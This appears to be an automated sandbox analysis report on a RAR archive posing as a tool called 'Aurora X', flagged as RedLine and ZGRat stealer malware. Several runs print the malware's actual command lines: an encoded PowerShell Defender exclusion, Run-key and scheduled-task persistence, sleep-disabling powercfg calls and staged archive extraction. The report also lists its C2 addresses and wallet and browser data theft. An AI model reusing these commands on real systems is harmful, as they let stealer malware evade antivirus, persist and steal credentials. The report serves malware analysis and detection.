Analysis Overview
SHA256
ba00978fa3933d128d43f7be77ecd4323284b4bdf1ac80ac0315ef09802749ae
Threat Level: Known bad
The file Aurora X [by RyosX].rar was found to be: Known bad.
Malicious Activity Summary
RedLine payload
RedLine
Detect ZGRat V1
ZGRat
CryptOne packer
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-01 16:49
Signatures
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-01 16:49
Reported
2024-03-01 16:52
Platform
win7-20240221-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/futuresplash | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\NavigatorPluginsList\Shockwave Flash\application/x-shockwave-flash | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB70-AE6D-11cf-96B8-444553540000}\Compatibility Flags = "65536" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.9\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000}\ = "_IShockwaveFlashEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\CLSID\ = "{D27CDB70-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.18\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.23\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ = "Macromedia Flash Factory Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\ = "Macromedia Flash Paper" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.10\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib\ = "{D27CDB6B-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.sor\Content Type = "text/plain" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6D-AE6D-11CF-96B8-444553540000} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.5\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\ = "{D27CDB6B-AE6D-11CF-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\CLSID\ = "{D27CDB6E-AE6D-11cf-96B8-444553540000}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Aurora_V2\\scripts\\scripts.dll, 1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.21\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ = "IFlashObject" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\FlashFactory.FlashFactory.1\ = "Macromedia Flash Factory Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.14 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.17 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86230738-D762-4C50-A2DE-A753E5B1686F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.13\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.16\ = "Shockwave Flash Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.mfp | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D27CDB6B-AE6D-11CF-96B8-444553540000}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.7\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D27CDB6C-AE6D-11CF-96B8-444553540000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\DefaultIcon | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ShockwaveFlash.ShockwaveFlash.3 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\EnableFullPage\.swf | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2324 wrote to memory of 3024 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-01 16:49
Reported
2024-03-01 16:52
Platform
win10-20240221-en
Max time kernel
122s
Max time network
142s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4176 wrote to memory of 4360 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4176 wrote to memory of 4360 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4176 wrote to memory of 4360 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\Aurora_V2\scripts\scripts.dll
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-01 16:49
Reported
2024-03-01 16:52
Platform
win7-20240221-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2756 wrote to memory of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2756 wrote to memory of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2756 wrote to memory of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2756 wrote to memory of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 520
Network
Files
memory/2756-0-0x0000000000120000-0x0000000000170000-memory.dmp
memory/2756-4-0x0000000074820000-0x0000000074F0E000-memory.dmp
memory/2756-5-0x0000000074820000-0x0000000074F0E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-01 16:49
Reported
2024-03-01 16:52
Platform
win10-20240221-en
Max time kernel
132s
Max time network
137s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1104443672-3570440473-4052989528-1000\Software\Microsoft\Windows\CurrentVersion\Run\kwweifjdskdv = "C:\\Users\\Admin\\AppData\\Local\\kwweifjdskdv\\kwweifjdskdv.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2788 set thread context of 776 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 1872 set thread context of 4252 | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"
C:\Users\Admin\AppData\Local\Temp\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\conhost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p146312891125116171371883110193 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv' -Value '"C:\Users\Admin\AppData\Local\kwweifjdskdv\kwweifjdskdv.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 45.15.156.167:80 | tcp | |
| US | 8.8.8.8:53 | 167.156.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.12.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.12.26.104.in-addr.arpa | udp |
| NL | 195.20.16.153:80 | 195.20.16.153 | tcp |
| US | 8.8.8.8:53 | 153.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joxi.net | udp |
| US | 172.67.162.70:80 | joxi.net | tcp |
| US | 172.67.162.70:443 | joxi.net | tcp |
| US | 8.8.8.8:53 | 70.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.193.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| NL | 195.20.16.153:80 | 195.20.16.153 | tcp |
| NL | 195.20.16.153:80 | 195.20.16.153 | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
memory/2364-0-0x00000000007B0000-0x0000000000800000-memory.dmp
memory/2364-4-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2364-5-0x0000000005330000-0x000000000582E000-memory.dmp
memory/2364-6-0x0000000004ED0000-0x0000000004F62000-memory.dmp
memory/2364-7-0x0000000005110000-0x0000000005120000-memory.dmp
memory/2364-8-0x0000000004E80000-0x0000000004E8A000-memory.dmp
memory/2364-9-0x0000000006280000-0x0000000006886000-memory.dmp
memory/2364-10-0x0000000007AE0000-0x0000000007BEA000-memory.dmp
